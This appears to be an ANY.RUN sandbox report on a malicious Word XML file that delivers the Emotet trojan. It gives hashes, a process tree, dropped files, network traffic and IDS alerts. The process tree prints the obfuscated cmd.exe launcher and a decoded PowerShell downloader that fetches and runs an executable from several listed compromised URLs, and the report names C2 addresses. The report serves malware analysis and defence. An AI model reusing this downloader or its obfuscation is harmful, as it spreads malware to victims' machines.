File name: | DOC-281704.doc |
Full analysis: | https://app.any.run/tasks/7897a6fe-e1ef-454e-a212-3993b1c4e0dc |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 22, 2019, 17:13:55 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 497806A40E9F9A212DC77AABEF10936D |
SHA1: | A31C38E4EF12F3517EBF6FD7C8D1F22531E18E41 |
SHA256: | BEFCA32B3D01FAB6455BA282764A7DC13D22B73711E41FF5150513C45C4916A4 |
SSDEEP: | 3072:xzRWs9T4+SojL/xSu90OoiLuDKZXfwKeljR1z:xb9MJexUOmD+XfwLX |
.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|
.xml | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | Generic XML (ASCII) (2.3) |
.html | HyperText Markup Language (1.4) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 000473DE |
WordDocumentBodySectPRsidRDefault: | 00DF7DB8 |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 005A24B1 |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | (base64-encoded binary data omitted) |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:22 15:05:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:01:22 15:05:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3636 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\DOC-281704.doc.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000 | ||||
3344 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOC-281704.doc.xml" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | MSOXMLED.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2764 | c:\j9656\k4197\v1873\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set kQXu=uh$oQv2m'dr%YE+Fe;g~ZBzpiLG8aIx{-kjOtN=yS7f)/WnT10sb6Pq4.C3VDRc5_}(9,\w@lAH XM:UK&&for %L in (23;3;70;11;53;79;21;25;29;57;78;19;63;68;48;11;10;11;40;13;40;40;29;35;37;37;73;77;13;78;19;32;55;68;48;11;1;11;47;13;77;53;78;19;32;58;68;48;11;72;72;75;2;1;48;63;41;67;38;8;46;48;27;55;52;8;17;2;0;52;52;6;27;38;46;16;70;32;3;51;34;16;62;36;75;37;16;36;56;45;16;51;57;72;24;16;46;36;17;2;3;67;6;27;27;38;8;1;36;36;23;78;44;44;70;70;70;56;28;23;42;32;16;46;36;10;16;23;10;24;50;16;50;27;49;56;62;3;7;44;18;74;67;13;54;52;4;23;6;54;21;73;50;51;37;71;1;36;36;23;78;44;44;70;70;70;56;9;16;5;24;36;42;3;10;70;28;10;9;56;62;3;7;44;74;0;62;80;23;18;54;50;36;52;79;28;39;64;59;7;80;77;71;1;36;36;23;78;44;44;62;28;7;32;36;16;62;1;56;24;10;44;41;48;26;61;54;34;22;42;10;20;71;1;36;36;23;78;44;44;72;28;34;24;10;28;42;28;50;3;23;1;24;16;56;62;3;7;44;70;23;32;24;46;62;72;0;9;16;50;44;47;74;61;67;10;13;33;72;45;76;29;22;20;42;71;1;36;36;23;78;44;44;16;50;9;16;56;28;72;44;59;26;4;12;60;45;23;59;64;13;6;27;13;13;55;76;33;33;8;56;40;23;72;24;36;66;8;71;8;43;17;2;5;41;63;27;41;38;8;34;55;67;58;58;8;17;2;46;58;52;67;55;75;38;75;8;52;55;58;8;17;2;1;6;6;41;38;8;36;55;63;55;6;8;17;2;34;63;27;67;55;38;2;16;46;5;78;36;16;7;23;14;8;69;8;14;2;46;58;52;67;55;14;8;56;16;30;16;8;17;42;3;10;16;28;62;1;66;2;3;58;49;67;67;75;24;46;75;2;3;67;6;27;27;43;31;36;10;39;31;2;0;52;52;6;27;56;60;3;70;46;72;3;28;9;15;24;72;16;66;2;3;58;49;67;67;68;75;2;34;63;27;67;55;43;17;2;42;41;55;41;41;38;8;7;58;48;52;63;8;17;29;42;75;66;66;26;16;36;32;29;36;16;7;75;2;34;63;27;67;55;43;56;72;16;46;18;36;1;75;32;18;16;75;55;49;49;49;49;43;75;31;29;46;5;3;33;16;32;29;36;16;7;75;2;34;63;27;67;55;17;2;72;27;49;41;41;38;8;7;55;67;55;41;8;17;51;10;16;28;33;17;65;65;62;28;36;62;1;31;65;65;2;22;63;49;6;49;38;8;7;27;27;27;58;8;17;91)do set tCK=!tCK!!kQXu:~%L,1!&&if %L geq 91 echo !tCK:*tCK!=!|FOR /F "delims=KHFN tokens=2" %5 
IN ('ftype^^^|find "mdFi"')DO %5 " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3368 | CmD /V:ON/C"set kQXu=uh$oQv2m'dr%YE+Fe;g~ZBzpiLG8aIx{-kjOtN=yS7f)/WnT10sb6Pq4.C3VDRc5_}(9,\w@lAH XM:UK&&for %L in (23;3;70;11;53;79;21;25;29;57;78;19;63;68;48;11;10;11;40;13;40;40;29;35;37;37;73;77;13;78;19;32;55;68;48;11;1;11;47;13;77;53;78;19;32;58;68;48;11;72;72;75;2;1;48;63;41;67;38;8;46;48;27;55;52;8;17;2;0;52;52;6;27;38;46;16;70;32;3;51;34;16;62;36;75;37;16;36;56;45;16;51;57;72;24;16;46;36;17;2;3;67;6;27;27;38;8;1;36;36;23;78;44;44;70;70;70;56;28;23;42;32;16;46;36;10;16;23;10;24;50;16;50;27;49;56;62;3;7;44;18;74;67;13;54;52;4;23;6;54;21;73;50;51;37;71;1;36;36;23;78;44;44;70;70;70;56;9;16;5;24;36;42;3;10;70;28;10;9;56;62;3;7;44;74;0;62;80;23;18;54;50;36;52;79;28;39;64;59;7;80;77;71;1;36;36;23;78;44;44;62;28;7;32;36;16;62;1;56;24;10;44;41;48;26;61;54;34;22;42;10;20;71;1;36;36;23;78;44;44;72;28;34;24;10;28;42;28;50;3;23;1;24;16;56;62;3;7;44;70;23;32;24;46;62;72;0;9;16;50;44;47;74;61;67;10;13;33;72;45;76;29;22;20;42;71;1;36;36;23;78;44;44;16;50;9;16;56;28;72;44;59;26;4;12;60;45;23;59;64;13;6;27;13;13;55;76;33;33;8;56;40;23;72;24;36;66;8;71;8;43;17;2;5;41;63;27;41;38;8;34;55;67;58;58;8;17;2;46;58;52;67;55;75;38;75;8;52;55;58;8;17;2;1;6;6;41;38;8;36;55;63;55;6;8;17;2;34;63;27;67;55;38;2;16;46;5;78;36;16;7;23;14;8;69;8;14;2;46;58;52;67;55;14;8;56;16;30;16;8;17;42;3;10;16;28;62;1;66;2;3;58;49;67;67;75;24;46;75;2;3;67;6;27;27;43;31;36;10;39;31;2;0;52;52;6;27;56;60;3;70;46;72;3;28;9;15;24;72;16;66;2;3;58;49;67;67;68;75;2;34;63;27;67;55;43;17;2;42;41;55;41;41;38;8;7;58;48;52;63;8;17;29;42;75;66;66;26;16;36;32;29;36;16;7;75;2;34;63;27;67;55;43;56;72;16;46;18;36;1;75;32;18;16;75;55;49;49;49;49;43;75;31;29;46;5;3;33;16;32;29;36;16;7;75;2;34;63;27;67;55;17;2;72;27;49;41;41;38;8;7;55;67;55;41;8;17;51;10;16;28;33;17;65;65;62;28;36;62;1;31;65;65;2;22;63;49;6;49;38;8;7;27;27;27;58;8;17;91)do set tCK=!tCK!!kQXu:~%L,1!&&if %L geq 91 echo !tCK:*tCK!=!|FOR /F "delims=KHFN tokens=2" %5 IN ('ftype^^^|find "mdFi"')DO %5 " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2976 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $h1579='n1846';$u6628=new-object Net.WebClient;$o9288='http://www.apf-entreprises80.com/gH9Eq6Qp2qBAsbN@http://www.devitforward.com/HucKpgqst6Uay_VmKM@http://cam-tech.ir/71GRqjzfrZ@http://lajirafasophie.com/wp-includes/THR9rEklWXIzZf@http://esde.al/VGQYDWpV_E28EE4Xkk'.Split('@');$v7587='j4933';$n3694 = '643';$h227='t4542';$j5894=$env:temp+'\'+$n3694+'.exe';foreach($o3099 in $o9288){try{$u6628.DownloadFile($o3099, $j5894);$f7477='m3165';If ((Get-Item $j5894).length -ge 40000) {Invoke-Item $j5894;$l8077='m4947';break;}}catch{}}$z5020='m8883';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3032 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=KHFN tokens=2" %5 IN ('ftype^|find "mdFi"') DO %5 " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1336 | C:\Windows\system32\cmd.exe /c ftype|find "mdFi" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3724 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3800 | find "mdFi" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2492 | Cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3344 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR911A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3344 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E63D3182.jpg | — | |
MD5:— | SHA256:— | |||
2752 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VBS90MINKX5TMZW7DMRL.temp | — | |
MD5:— | SHA256:— | |||
2752 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a975.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2752 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3680 | 643.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:FAB33D99A263650FB24018CAB7D65AC9 | SHA256:785C2D79490E3302C18E618BEF73D3DB5EDC4FC6C2A4323D53F45858878208B2 | |||
3344 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B63E0CADFFAD2BE15CACE5098449DE7D | SHA256:0C4292C028F0E13DB0AC7C146510D071B680F092A5576337DB213B97E3A17A6A | |||
3344 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$C-281704.doc.xml | pgc | |
MD5:EF7A674F7A814C12E71152BBA3AA10D5 | SHA256:AAAF6F6B678872AF070FDCFAB2DA91040BB582522DCA86C336E140DDB8027E08 | |||
3344 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:2A7426FD64131C8A0EB0B5A35EDC4452 | SHA256:92CC5AD6E3E74D05432F6AD5C8199CDAB483E6C39C8238823EECA2F67DFA76E3 | |||
2752 | powershell.exe | C:\Users\admin\AppData\Local\Temp\643.exe | executable | |
MD5:FAB33D99A263650FB24018CAB7D65AC9 | SHA256:785C2D79490E3302C18E618BEF73D3DB5EDC4FC6C2A4323D53F45858878208B2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2104 | wabmetagen.exe | GET | — | 206.248.110.184:8080 | http://206.248.110.184:8080/ | PR | — | — | malicious |
2752 | powershell.exe | GET | 301 | 213.186.33.17:80 | http://www.apf-entreprises80.com/gH9Eq6Qp2qBAsbN | FR | html | 257 b | malicious |
2752 | powershell.exe | GET | 200 | 213.186.33.17:80 | http://www.apf-entreprises80.com/gH9Eq6Qp2qBAsbN/ | FR | executable | 560 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2104 | wabmetagen.exe | 182.180.170.72:22 | — | Pakistan Telecom Company Limited | PK | suspicious |
2104 | wabmetagen.exe | 206.248.110.184:8080 | — | — | PR | malicious |
2752 | powershell.exe | 213.186.33.17:80 | www.apf-entreprises80.com | OVH SAS | FR | malicious |
Domain | IP | Reputation |
---|---|---|
www.apf-entreprises80.com | | malicious |
dns.msftncsi.com | | shared |
PID | Process | Class | Message |
---|---|---|---|
2752 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2752 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2752 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2752 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2752 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |